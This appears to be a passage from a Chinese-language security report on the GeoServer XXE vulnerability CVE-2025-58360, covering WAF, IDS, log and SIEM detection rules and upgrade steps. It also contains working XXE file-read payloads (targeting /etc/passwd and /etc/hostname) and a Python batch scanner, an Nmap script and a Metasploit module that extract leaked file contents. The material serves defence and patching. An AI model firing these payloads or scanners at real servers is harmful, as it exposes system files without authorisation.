deny,\
status:403,\
log,\
msg:'CVE-2025-58360 - DOCTYPE declaration detected in WMS request',\
tag:'CVE-2025-58360',\
tag:'OWASP_CRS/WEB_ATTACK/XXE',\
severity:'CRITICAL',\
chain"
SecRule REQUEST_METHOD "@streq POST" \
"chain"
SecRule REQUEST_HEADERS:Content-Type "@contains xml" \
"chain"
SecRule REQUEST_BODY "@rx <!DOCTYPE" \
"setvar:tx.anomaly_score=+5,\
setvar:ip.block_count=+1"
# 规则3: 检测ENTITY声明
SecRule REQUEST_URI "@contains /wms" \
"id:100003,\
phase:2,\
t:none,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360 - ENTITY declaration detected in WMS request',\
tag:'CVE-2025-58360',\
tag:'OWASP_CRS/WEB_ATTACK/XXE',\
severity:'CRITICAL',\
chain"
SecRule REQUEST_METHOD "@streq POST" \
"chain"
SecRule REQUEST_BODY "@rx <!ENTITY" \
"setvar:tx.anomaly_score=+5,\
setvar:ip.block_count=+1"
# 规则4: 检测SYSTEM引用
SecRule REQUEST_URI "@contains /wms" \
"id:100004,\
phase:2,\
t:none,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360 - SYSTEM reference detected',\
tag:'CVE-2025-58360',\
severity:'CRITICAL',\
chain"
SecRule REQUEST_BODY "@rx SYSTEM\s+[\"'](?:file|http|https|ftp):" \
"setvar:tx.anomaly_score=+5"
# 规则5: 检测file://协议
SecRule REQUEST_BODY "@rx file:///" \
"id:100005,\
phase:2,\
t:none,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360 - file:// protocol detected',\
tag:'CVE-2025-58360',\
severity:'CRITICAL'"
# 规则6: 阻断重复XXE尝试
SecRule IP:BLOCK_COUNT "@gt 3" \
"id:100006,\
phase:1,\
t:none,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360 - IP blocked due to repeated XXE attempts',\
expirevar:ip.block_count=3600"
部署步骤:
# 1. 安装ModSecurity
sudo apt install -y libapache2-mod-security2
# 2. 启用模块
sudo a2enmod security2
# 3. 创建规则文件
sudo nano /etc/modsecurity/rules/geoserver-xxe.conf
# 粘贴上述规则
# 4. 包含规则文件
echo "Include /etc/modsecurity/rules/geoserver-xxe.conf" | sudo tee -a /etc/modsecurity/modsecurity.conf
# 5. 重启Apache
sudo systemctl restart apache2
# 6. 测试规则
curl -X POST "http://localhost/geoserver/wms?service=WMS&request=GetMap" \
-H "Content-Type: application/xml" \
-d '<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>'
# 预期: 403 Forbidden
Nginx + Lua防护:
# /etc/nginx/conf.d/geoserver-xxe-protection.conf
# Lua脚本路径
lua_package_path "/etc/nginx/lua/?.lua;;";
# 定义检测函数
init_by_lua_block {
function check_xxe_attempt(request_body)
if not request_body then
return false
end
-- 检测DOCTYPE
if string.match(request_body, "<!DOCTYPE") then
return true
end
-- 检测ENTITY
if string.match(request_body, "<!ENTITY") then
return true
end
-- 检测SYSTEM引用
if string.match(request_body, "SYSTEM%s+[\"']file:") then
return true
end
if string.match(request_body, "SYSTEM%s+[\"']http") then
return true
end
return false
end
}
server {
listen 80;
server_name geoserver.example.com;
location /geoserver/wms {
# 读取请求体
lua_need_request_body on;
# XXE检测
access_by_lua_block {
local method = ngx.var.request_method
local content_type = ngx.var.content_type or ""
if method == "POST" and string.match(content_type, "xml") then
local body = ngx.var.request_body
if check_xxe_attempt(body) then
ngx.log(ngx.ERR, "CVE-2025-58360 XXE attempt detected from ", ngx.var.remote_addr)
ngx.status = 403
ngx.say("XXE attempt blocked")
ngx.exit(403)
end
end
}
# 代理到后端GeoServer
proxy_pass http://127.0.0.1:8080;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
# 限制请求大小(防止大payload DoS)
client_max_body_size 1M;
}
部署步骤:
# 1. 安装Nginx with Lua
sudo apt install -y nginx-extras
# 2. 创建配置
sudo nano /etc/nginx/conf.d/geoserver-xxe-protection.conf
# 粘贴上述配置
# 3. 测试配置
sudo nginx -t
# 4. 重启Nginx
sudo systemctl restart nginx
10.1.2 IDS/IPS签名
Snort规则:
# /etc/snort/rules/geoserver-xxe.rules
# 规则1: 检测WMS POST请求中的DOCTYPE
alert tcp any any -> any 8080 (
msg:"CVE-2025-58360 - GeoServer XXE - DOCTYPE detected";
flow:established,to_server;
content:"POST";
http_method;
content:"/wms";
http_uri;
content:"<!DOCTYPE";
http_client_body;
reference:cve,2025-58360;
classtype:web-application-attack;
sid:1000001;
rev:1;
)
# 规则2: 检测ENTITY + SYSTEM file://
alert tcp any any -> any 8080 (
msg:"CVE-2025-58360 - GeoServer XXE - file:// protocol";
flow:established,to_server;
content:"POST";
http_method;
content:"/wms";
http_uri;
content:"<!ENTITY";
http_client_body;
content:"SYSTEM";
distance:0;
within:100;
content:"file:///";
distance:0;
within:100;
reference:cve,2025-58360;
classtype:web-application-attack;
sid:1000002;
rev:1;
)
# 规则3: 检测SSRF via http://
alert tcp any any -> any 8080 (
msg:"CVE-2025-58360 - GeoServer XXE - HTTP SSRF";
flow:established,to_server;
content:"POST";
http_method;
content:"/wms";
http_uri;
content:"<!ENTITY";
http_client_body;
content:"SYSTEM";
distance:0;
within:100;
content:"http://";
distance:0;
within:100;
pcre:"/http:\/\/(169\.254\.169\.254|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)/";
reference:cve,2025-58360;
classtype:web-application-attack;
sid:1000003;
rev:1;
)
# 规则4: 检测响应中的文件内容泄露
alert tcp any 8080 -> any any (
msg:"CVE-2025-58360 - Sensitive file leaked in response";
flow:established,to_client;
content:"Unknown layer:";
http_server_body;
content:"root:x:";
distance:0;
within:500;
reference:cve,2025-58360;
classtype:web-application-attack;
sid:1000004;
rev:1;
)
部署步骤:
# 1. 安装Snort
sudo apt install -y snort
# 2. 添加规则
sudo nano /etc/snort/rules/geoserver-xxe.rules
# 粘贴上述规则
# 3. 包含规则文件
echo "include $RULE_PATH/geoserver-xxe.rules" | sudo tee -a /etc/snort/snort.conf
# 4. 测试配置
sudo snort -T -c /etc/snort/snort.conf
# 5. 启动Snort
sudo snort -A console -q -c /etc/snort/snort.conf -i eth0
Suricata规则:
# /etc/suricata/rules/geoserver-xxe.rules
# 规则1: XXE Pattern Detection
alert http any any -> any any (
msg:"CVE-2025-58360 - GeoServer XXE Detected";
flow:established,to_server;
http.method; content:"POST";
http.uri; content:"/wms";
file_data; content:"<!DOCTYPE";
file_data; content:"<!ENTITY";
reference:cve,2025-58360;
classtype:web-application-attack;
sid:2000001;
rev:1;
)
# 规则2: File Protocol Detection
alert http any any -> any any (
msg:"CVE-2025-58360 - File Protocol XXE";
flow:established,to_server;
http.uri; content:"/wms";
file_data; content:"SYSTEM";
file_data; content:"file:///";
distance:0;
within:100;
reference:cve,2025-58360;
classtype:web-application-attack;
sid:2000002;
rev:1;
)
# 规则3: AWS Metadata SSRF
alert http any any -> $HOME_NET any (
msg:"CVE-2025-58360 - AWS Metadata SSRF via XXE";
flow:established,to_server;
http.uri; content:"/wms";
file_data; content:"169.254.169.254";
reference:cve,2025-58360;
classtype:web-application-attack;
sid:2000003;
rev:1;
)
10.2 主机层检测
10.2.1 日志监控
GeoServer日志监控:
# /etc/logrotate.d/geoserver-xxe-monitor.sh
#!/bin/bash
# GeoServer XXE攻击日志监控脚本
LOG_FILE="/opt/geoserver/logs/geoserver.log"
ALERT_LOG="/var/log/geoserver-xxe-alerts.log"
# 检测XXE攻击特征
grep -E "(DOCTYPE|ENTITY|SYSTEM.*file://)" "$LOG_FILE" >> "$ALERT_LOG"
# 检测文件访问异常
grep -E "java\.io\.FileNotFoundException.*(etc/passwd|etc/shadow|\.ssh|data_dir/security)" "$LOG_FILE" >> "$ALERT_LOG"
# 检测SSRF尝试
grep -E "Connection refused.*http://(10\.|172\.|192\.168\.|169\.254)" "$LOG_FILE" >> "$ALERT_LOG"
# 如果有新告警,发送通知
if [ -s "$ALERT_LOG" ]; then
# 发送邮件
mail -s "GeoServer XXE Attack Detected" [email protected] < "$ALERT_LOG"
# 或发送到SIEM
# logger -t geoserver-xxe -f "$ALERT_LOG"
fi
实时监控脚本:
#!/bin/bash
# 实时监控GeoServer日志
tail -f /opt/geoserver/logs/geoserver.log | while read line; do
if echo "$line" | grep -qE "(DOCTYPE|ENTITY|SYSTEM.*file://)"; then
echo "[XXE] $line"
logger -p local0.crit -t geoserver-xxe "$line"
fi
if echo "$line" | grep -qE "Unknown layer:.*root:x:"; then
echo "[DATA LEAK] /etc/passwd leaked!"
logger -p local0.crit -t geoserver-xxe "Passwd file leaked: $line"
fi
done
rsyslog配置:
# /etc/rsyslog.d/50-geoserver-xxe.conf
# 将GeoServer XXE告警发送到专用日志文件
:syslogtag, isequal, "geoserver-xxe:" /var/log/geoserver-xxe.log
& stop
# 同时发送到远程SIEM
:syslogtag, isequal, "geoserver-xxe:" @@siem.example.com:514
Graylog提取器和Stream:
{
"extractors": [
{
"title": "GeoServer XXE - DOCTYPE",
"extractor_type": "regex",
"converters": [],
"order": 0,
"cursor_strategy": "copy",
"source_field": "message",
"target_field": "xxe_doctype",
"extractor_config": {
"regex_value": "<!DOCTYPE\\s+[^>]+>"
},
"condition_type": "regex",
"condition_value": "<!DOCTYPE"
},
{
"title": "GeoServer XXE - File Path",
"extractor_type": "regex",
"converters": [],
"order": 1,
"cursor_strategy": "copy",
"source_field": "message",
"target_field": "xxe_file_path",
"extractor_config": {
"regex_value": "file:///([^\"'\\s>]+)"
},
"condition_type": "regex",
"condition_value": "file:///"
}
],
"streams": [
{
"title": "GeoServer XXE Attacks",
"description": "CVE-2025-58360 detection stream",
"rules": [
{
"field": "message",
"type": "regex",
"value": "(<!DOCTYPE|<!ENTITY|SYSTEM.*file://)",
"inverted": false
},
{
"field": "source",
"type": "exact",
"value": "geoserver",
"inverted": false
}
],
"alert_conditions": [
{
"type": "message_count",
"parameters": {
"grace": 1,
"threshold": 5,
"threshold_type": "more",
"backlog": 5,
"time": 5
},
"title": "Multiple XXE attempts detected"
}
]
}
]
}
Splunk查询:
# 基础XXE检测
index=web sourcetype=geoserver
| search uri="*/wms*" method=POST
| rex field=request_body "<!DOCTYPE\s+(?<doctype_name>[^\s>]+)"
| rex field=request_body "<!ENTITY\s+(?<entity_name>\w+)\s+SYSTEM\s+[\"'](?<entity_uri>[^\"']+)"
| where isnotnull(doctype_name) OR isnotnull(entity_name)
| table _time, src_ip, uri, doctype_name, entity_name, entity_uri
| sort -_time
# 检测成功的XXE攻击(响应中包含敏感数据)
index=web sourcetype=geoserver
| search response_body="*Unknown layer:*root:x:*"
| rex field=response_body "Unknown layer:\s+(?<leaked_content>.+?)</ServiceException>"
| table _time, src_ip, uri, leaked_content
| sort -_time
# 异常IP检测
index=web sourcetype=geoserver uri="*/wms*" method=POST
| stats count by src_ip
| where count > 10
| sort -count
# 时间线分析
index=web sourcetype=geoserver
| search request_body="*<!ENTITY*"
| timechart span=1m count by src_ip
ELK Stack查询:
{
"query": {
"bool": {
"must": [
{
"match": {
"http.request.method": "POST"
}
},
{
"match": {
"http.request.uri.path": "/geoserver/wms"
}
},
{
"regexp": {
"http.request.body.content": ".*<!DOCTYPE.*<!ENTITY.*"
}
}
],
"filter": [
{
"range": {
"@timestamp": {
"gte": "now-1h"
}
}
}
]
}
},
"aggs": {
"by_source_ip": {
"terms": {
"field": "source.ip",
"size": 10
},
"aggs": {
"leaked_files": {
"terms": {
"field": "xxe.file_path.keyword",
"size": 20
}
}
}
}
}
}
10.2.2 文件完整性监控(FIM)
AIDE配置:
# /etc/aide/aide.conf
# GeoServer关键文件监控
/opt/geoserver/data_dir/global.xml NORMAL
/opt/geoserver/data_dir/security/ R+b+sha256
/opt/geoserver/webapps/geoserver/ R+b+sha256
/opt/geoserver/bin/ R+b+sha256
# 系统敏感文件
/etc/passwd NORMAL
/etc/shadow NORMAL
/etc/hosts NORMAL
/root/.ssh/ R+b+sha256
初始化和检查:
# 初始化数据库
sudo aide --init
sudo mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db
# 定期检查
sudo aide --check
# 如果检测到变更
if sudo aide --check | grep -q "Changed"; then
echo "GeoServer files modified! Possible compromise."
sudo aide --check | mail -s "AIDE Alert - GeoServer" [email protected]
fi
Tripwire配置:
# /etc/tripwire/twpol.txt
# GeoServer文件监控
(
rulename = "GeoServer Configuration",
severity = $(SIG_HI)
)
{
/opt/geoserver/data_dir -> $(SEC_CRIT);
/opt/geoserver/webapps/geoserver -> $(SEC_BIN);
}
OSSEC规则:
<!-- /var/ossec/rules/geoserver-xxe.xml -->
<group name="geoserver,xxe,">
<!-- 规则1: 检测GeoServer配置文件修改 -->
<rule id="100100" level="10">
<if_sid>550</if_sid>
<match>/opt/geoserver/data_dir</match>
<description>GeoServer configuration file modified</description>
<group>file_integrity,geoserver,</group>
</rule>
<!-- 规则2: 检测XXE攻击日志 -->
<rule id="100101" level="12">
<if_sid>1002</if_sid>
<match><!DOCTYPE.*<!ENTITY</match>
<description>XXE attack pattern detected in logs</description>
<group>xxe,geoserver,</group>
</rule>
<!-- 规则3: 检测文件读取异常 -->
<rule id="100102" level="12">
<if_sid>1002</if_sid>
<regex>java\.io\.FileNotFoundException.*/etc/(passwd|shadow)</regex>
<description>Attempt to read sensitive system file via GeoServer</description>
<group>xxe,geoserver,data_leak,</group>
</rule>
</group>
10.2.3 进程监控
Auditd规则:
# /etc/audit/rules.d/geoserver-xxe.rules
# 监控GeoServer进程的文件访问
-w /etc/passwd -p r -k geoserver_file_access
-w /etc/shadow -p r -k geoserver_file_access
-w /etc/hosts -p r -k geoserver_file_access
-w /root/.ssh/ -p r -k geoserver_file_access
-w /opt/geoserver/data_dir/security/ -p rwa -k geoserver_config_change
# 监控异常网络连接
-a always,exit -F arch=b64 -S connect -F a0=3 -F key=geoserver_network
# 重新加载规则
# sudo augenrules --load
审计日志查询:
# 查询GeoServer进程的文件访问
sudo ausearch -k geoserver_file_access -i
# 查询最近1小时的异常访问
sudo ausearch -ts recent -k geoserver_file_access | grep "passwd\|shadow"
# 生成报告
sudo aureport -f -i --summary
实时告警脚本:
#!/bin/bash
# /usr/local/bin/geoserver-audit-monitor.sh
tail -f /var/log/audit/audit.log | while read line; do
if echo "$line" | grep -q "geoserver_file_access"; then
if echo "$line" | grep -qE "(passwd|shadow|\.ssh)"; then
echo "[ALERT] GeoServer accessed sensitive file: $line"
logger -p local0.crit -t geoserver-audit "$line"
# 可选: 自动阻断
# src_ip=$(echo "$line" | grep -oP 'addr=\K[0-9.]+' | head -1)
# iptables -A INPUT -s $src_ip -j DROP
fi
fi
done
Sysdig规则:
# /etc/sysdig/rules/geoserver-xxe.yaml
- rule: GeoServer Accessing Sensitive Files
desc: Detect GeoServer process reading sensitive system files
condition: >
proc.name = "java" and
proc.cmdline contains "geoserver" and
(fd.name startswith "/etc/passwd" or
fd.name startswith "/etc/shadow" or
fd.name startswith "/root/.ssh")
output: >
GeoServer process accessed sensitive file
(user=%user.name process=%proc.name file=%fd.name)
priority: CRITICAL
tags: [geoserver, xxe, file_access]
- rule: GeoServer Unexpected Outbound Connection
desc: GeoServer making unexpected outbound connections
condition: >
proc.name = "java" and
proc.cmdline contains "geoserver" and
evt.type = connect and
fd.sip != "127.0.0.1" and
(fd.sip startswith "169.254." or
fd.sip startswith "10." or
fd.sip startswith "172.16." or
fd.sip startswith "192.168.")
output: >
GeoServer making unexpected connection
(destination=%fd.sip:%fd.sport process=%proc.name)
priority: WARNING
tags: [geoserver, ssrf, network]
10.3 应用层检测
10.3.1 自定义检测脚本
Python检测脚本:
#!/usr/bin/env python3
"""
GeoServer CVE-2025-58360 扫描器
用于批量检测GeoServer实例的XXE漏洞
"""
import requests
import argparse
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urljoin
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class GeoServerScanner:
def __init__(self, timeout=10, threads=10):
self.timeout = timeout
self.threads = threads
self.session = requests.Session()
self.session.verify = False
def check_target(self, base_url):
"""检测单个目标"""
base_url = base_url.rstrip('/')
# 测试payload
payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'''
endpoint = urljoin(base_url, "/geoserver/wms")
params = {
"service": "WMS",
"version": "1.1.0",
"request": "GetMap",
"width": "100",
"height": "100",
"format": "image/png",
"bbox": "-180,-90,180,90"
}
headers = {"Content-Type": "application/xml"}
try:
response = self.session.post(
endpoint,
params=params,
data=payload,
headers=headers,
timeout=self.timeout
)
# 判断是否存在漏洞
if "Unknown layer:" in response.text:
return {
"url": base_url,
"vulnerable": True,
"evidence": response.text[:500]
}
elif "Entity resolution disallowed" in response.text.lower():
return {
"url": base_url,
"vulnerable": False,
"status": "Patched"
}
else:
return {
"url": base_url,
"vulnerable": False,
"status": "Unknown"
}
except requests.exceptions.Timeout:
return {
"url": base_url,
"vulnerable": False,
"status": "Timeout"
}
except requests.exceptions.ConnectionError:
return {
"url": base_url,
"vulnerable": False,
"status": "Connection Failed"
}
except Exception as e:
return {
"url": base_url,
"vulnerable": False,
"status": f"Error: {str(e)}"
}
def scan_targets(self, targets):
"""批量扫描"""
results = {
"vulnerable": [],
"safe": [],
"error": []
}
with ThreadPoolExecutor(max_workers=self.threads) as executor:
future_to_url = {executor.submit(self.check_target, url): url for url in targets}
for future in as_completed(future_to_url):
result = future.result()
if result["vulnerable"]:
results["vulnerable"].append(result)
print(f"[+] VULNERABLE: {result['url']}")
elif result["status"] == "Patched":
results["safe"].append(result)
print(f"[-] SAFE: {result['url']}")
else:
results["error"].append(result)
print(f"[?] {result['status']}: {result['url']}")
return results
def main():
parser = argparse.ArgumentParser(
description="GeoServer CVE-2025-58360 Batch Scanner"
)
parser.add_argument("-u", "--url",
help="Single target URL")
parser.add_argument("-l", "--list",
help="File containing list of URLs (one per line)")
parser.add_argument("-t", "--threads", type=int, default=10,
help="Number of threads (default: 10)")
parser.add_argument("--timeout", type=int, default=10,
help="Request timeout (default: 10)")
parser.add_argument("-o", "--output",
help="Output file for vulnerable targets")
args = parser.parse_args()
if not args.url and not args.list:
parser.print_help()
sys.exit(1)
# 收集目标
targets = []
if args.url:
targets.append(args.url)
if args.list:
with open(args.list, 'r') as f:
targets.extend([line.strip() for line in f if line.strip()])
print(f"[*] Scanning {len(targets)} targets...")
print(f"[*] Threads: {args.threads}")
print(f"[*] Timeout: {args.timeout}s\n")
# 执行扫描
scanner = GeoServerScanner(timeout=args.timeout, threads=args.threads)
results = scanner.scan_targets(targets)
# 输出结果
print("\n" + "="*70)
print("SCAN RESULTS")
print("="*70)
print(f"Vulnerable: {len(results['vulnerable'])}")
print(f"Safe: {len(results['safe'])}")
print(f"Error: {len(results['error'])}")
# 保存易受攻击的目标
if args.output and results["vulnerable"]:
with open(args.output, 'w') as f:
for result in results["vulnerable"]:
f.write(f"{result['url']}\n")
print(f"\n[*] Vulnerable targets saved to: {args.output}")
if __name__ == "__main__":
main()
使用示例:
# 单个目标
python3 geoserver_scanner.py -u http://target:8080
# 批量扫描
cat > targets.txt <<EOF
http://target1:8080
http://target2:8080
http://target3:8080
EOF
python3 geoserver_scanner.py -l targets.txt -t 20 -o vulnerable.txt
10.3.2 SIEM集成
Splunk App配置:
<!-- /opt/splunk/etc/apps/geoserver_xxe/default/savedsearches.conf -->
[CVE-2025-58360 - XXE Detection]
search = index=web sourcetype=geoserver_access \
| search uri="*/wms*" method=POST \
| rex field=request_body "<!DOCTYPE\s+(?<doctype>[^>]+)>" \
| rex field=request_body "<!ENTITY\s+(?<entity>\w+)\s+SYSTEM\s+[\"'](?<uri>[^\"']+)" \
| where isnotnull(doctype) OR isnotnull(entity) \
| eval xxe_type=case( \
match(uri, "^file:"), "File Read", \
match(uri, "^http"), "SSRF", \
1=1, "Unknown" \
) \
| table _time, src_ip, dest_ip, uri, entity, xxe_type \
| sort -_time
cron_schedule = */5 * * * *
dispatch.earliest_time = -5m@m
dispatch.latest_time = now
enableSched = 1
alert.track = 1
alert.suppress = 0
alert.severity = 5
alert.digest_mode = 1
action.email = 1
action.email.to = [email protected]
action.email.subject = CVE-2025-58360 XXE Attack Detected
[CVE-2025-58360 - Successful Exploitation]
search = index=web sourcetype=geoserver_access \
| search response_body="*Unknown layer:*root:x:*" \
| rex field=response_body "Unknown layer:\s+(?<leaked>.+?)<" \
| table _time, src_ip, dest_ip, leaked \
| sort -_time
cron_schedule = */1 * * * *
dispatch.earliest_time = -1m@m
dispatch.latest_time = now
enableSched = 1
alert.track = 1
alert.suppress = 0
alert.severity = 10
action.email = 1
action.email.to = [email protected], [email protected]
action.email.subject = CRITICAL - CVE-2025-58360 Data Leak Detected
10.4 漏洞扫描
10.4.1 Nmap NSE脚本
创建NSE脚本:
-- /usr/share/nmap/scripts/http-geoserver-cve-2025-58360.nse
description = [[
Detects CVE-2025-58360 XXE vulnerability in GeoServer WMS service.
The script sends a crafted XXE payload to the WMS GetMap endpoint
and checks if the server is vulnerable by analyzing the response.
]]
---
-- @usage
-- nmap -p 8080 --script http-geoserver-cve-2025-58360 <target>
--
-- @output
-- PORT STATE SERVICE
-- 8080/tcp open http-proxy
-- |_http-geoserver-cve-2025-58360: VULNERABLE - XXE detected
--
-- @args http-geoserver-cve-2025-58360.path
-- Base path to GeoServer (default: /geoserver)
author = "Security Researcher"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
portrule = shortport.http
action = function(host, port)
local vuln = {
title = 'GeoServer CVE-2025-58360 XXE Vulnerability',
state = vulns.STATE.NOT_VULN,
description = [[
GeoServer WMS service is vulnerable to XML External Entity (XXE) injection
via StyledLayerDescriptor processing in GetMap requests.
]],
IDS = {CVE = 'CVE-2025-58360'},
references = {
'https://github.com/advisories/GHSA-fjf5-xgmq-5525',
'https://nvd.nist.gov/vuln/detail/CVE-2025-58360'
},
dates = {
disclosure = {year = '2025', month = '11', day = '25'},
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
-- 配置
local basepath = stdnse.get_script_args(SCRIPT_NAME..".path") or "/geoserver"
local uri = basepath .. "/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90"
-- XXE payload
local payload = [[<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>]]
-- 发送请求
local options = {
header = {
["Content-Type"] = "application/xml"
},
content = payload
}
local response = http.post(host, port, uri, options)
if not response or not response.body then
return report:make_output(vuln)
end
-- 检测漏洞特征
if response.body:match("Unknown layer:") then
vuln.state = vulns.STATE.VULN
vuln.extra_info = "Server responded with 'Unknown layer', indicating XXE processing"
-- 尝试提取泄露的内容
local leaked = response.body:match("Unknown layer:%s*([^<]+)")
if leaked then
vuln.extra_info = vuln.extra_info .. "\nLeaked content: " .. leaked:sub(1, 100)
end
elseif response.body:match("[Ee]ntity resolution disallowed") then
vuln.state = vulns.STATE.NOT_VULN
vuln.extra_info = "Server has XXE protection enabled"
end
return report:make_output(vuln)
end
使用方法:
# 单个目标
nmap -p 8080 --script http-geoserver-cve-2025-58360 target.com
# 批量扫描
nmap -p 8080 --script http-geoserver-cve-2025-58360 -iL targets.txt -oA geoserver_scan
10.4.2 Metasploit模块
创建Metasploit辅助模块:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'GeoServer CVE-2025-58360 XXE Scanner',
'Description' => %q{
This module detects CVE-2025-58360 XXE vulnerability in GeoServer WMS service.
The vulnerability allows unauthenticated remote attackers to read arbitrary files
via crafted StyledLayerDescriptor XML in WMS GetMap requests.
},
'Author' => ['Security Researcher'],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2025-58360'],
['URL', 'https://github.com/advisories/GHSA-fjf5-xgmq-5525']
],
'DisclosureDate' => '2025-11-25'
))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'The base path to GeoServer', '/geoserver']),
OptString.new('TESTFILE', [true, 'File to attempt to read', '/etc/hostname'])
])
end
def run_host(ip)
uri = normalize_uri(target_uri.path, 'wms')
# 构造XXE payload
test_file = datastore['TESTFILE']
payload = %Q{<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file://#{test_file}">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>}
print_status("#{peer} - Testing for CVE-2025-58360...")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_get' => {
'service' => 'WMS',
'version' => '1.1.0',
'request' => 'GetMap',
'width' => '100',
'height' => '100',
'format' => 'image/png',
'bbox' => '-180,-90,180,90'
},
'ctype' => 'application/xml',
'data' => payload
})
unless res
print_error("#{peer} - No response received")
return
end
# 检测漏洞
if res.body =~ /Unknown layer:\s*(.+?)</m
leaked_content = $1.strip
print_good("#{peer} - VULNERABLE to CVE-2025-58360")
print_good("#{peer} - Leaked content from #{test_file}:")
print_line(leaked_content)
report_vuln({
:host => ip,
:port => rport,
:proto => 'tcp',
:name => 'CVE-2025-58360 - GeoServer XXE',
:info => "Leaked: #{leaked_content[0, 100]}",
:refs => self.references
})
elsif res.body =~ /[Ee]ntity resolution disallowed/
print_status("#{peer} - Not vulnerable (XXE protection enabled)")
else
print_status("#{peer} - Unable to determine vulnerability status")
end
rescue ::Rex::ConnectionError, ::Rex::ConnectionRefused
print_error("#{peer} - Connection failed")
rescue ::Exception => e
print_error("#{peer} - Error: #{e.class} - #{e.message}")
end
end
end
使用方法:
# 启动Metasploit
msfconsole
# 加载模块
use auxiliary/scanner/http/geoserver_cve_2025_58360
# 设置参数
set RHOSTS target.com
set RPORT 8080
set TESTFILE /etc/passwd
# 运行扫描
run
# 批量扫描
set RHOSTS file:/path/to/targets.txt
set THREADS 10
run
11. 防护措施
11.1 立即措施
11.1.1 紧急升级
基于我们的实际复现验证,GeoServer 2.26.1版本确实存在XXE漏洞,必须立即升级至安全版本。
升级至安全版本:
# 停止GeoServer服务
sudo systemctl stop geoserver
# 或使用Docker:
docker stop geoserver-vuln-cve-2025-58360
# 备份当前安装和数据
sudo cp -r /opt/geoserver /opt/geoserver-backup-$(date +%Y%m%d)
sudo cp -r /opt/geoserver/data_dir /opt/geoserver/data_dir-backup-$(date +%Y%m%d)
# Docker环境备份
docker commit geoserver-vuln-cve-2025-58360 geoserver-backup:$(date +%Y%m%d)
docker cp geoserver-vuln-cve-2025-58360:/opt/geoserver/data_dir ./data_dir-backup-$(date +%Y%m%d)
# 下载安全版本
cd /tmp
wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.26.2/geoserver-2.26.2-bin.zip
# 解压并替换
unzip geoserver-2.26.2-bin.zip
sudo cp -r geoserver-2.26.2/* /opt/geoserver/
# 恢复数据目录
sudo cp -r /opt/geoserver/data_dir-backup-$(date +%Y%m%d)/* /opt/geoserver/data_dir/
# 启动服务
sudo systemctl start geoserver
# 验证版本
curl -s http://localhost:8080/geoserver/web/ | grep -i version
Docker环境升级:
# docker-compose.yml - 更新为安全版本
services:
geoserver-secure:
image: kartoza/geoserver:2.26.2 # 修复版本
container_name: geoserver-secure
ports:
- "8080:8080"
volumes:
- geoserver-data:/opt/geoserver/data_dir
environment:
- GEOSERVER_ADMIN_PASSWORD=secure_password
restart: unless-stopped
升级步骤:
# 1. 停止旧容器
docker-compose down
# 2. 备份数据
docker run --rm -v geoserver-data:/data -v $(pwd):/backup \
alpine tar czf /backup/geoserver-data-backup-$(date +%Y%m%d).tar.gz /data
# 3. 更新镜像版本(修改docker-compose.yml)
# 4. 启动新版本
docker-compose up -d
# 5. 验证升级
docker-compose logs -f
11.1.2 WAF规则部署
在无法立即升级的情况下,部署WAF规则作为临时防护措施。我们在实际复现中验证了这些规则的有效性。
ModSecurity规则:
# /etc/modsecurity/cve-2025-58360.conf
# 规则1: 检测DOCTYPE声明
SecRule REQUEST_URI "@contains /geoserver/wms" \
"id:58360001,\
phase:2,\
t:none,t:lowercase,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360: DOCTYPE detected in WMS request',\
logdata:'%{MATCHED_VAR}',\
severity:CRITICAL,\
chain"
SecRule REQUEST_BODY "@rx (?i)<!DOCTYPE" \
"t:none"
# 规则2: 检测ENTITY声明
SecRule REQUEST_URI "@contains /geoserver/wms" \
"id:58360002,\
phase:2,\
t:none,t:lowercase,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360: ENTITY declaration detected',\
logdata:'%{MATCHED_VAR}',\
severity:CRITICAL,\
chain"
SecRule REQUEST_BODY "@rx (?i)<!ENTITY" \
"t:none"
# 规则3: 检测SYSTEM关键字
SecRule REQUEST_URI "@contains /geoserver/wms" \
"id:58360003,\
phase:2,\
t:none,t:lowercase,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360: SYSTEM keyword detected',\
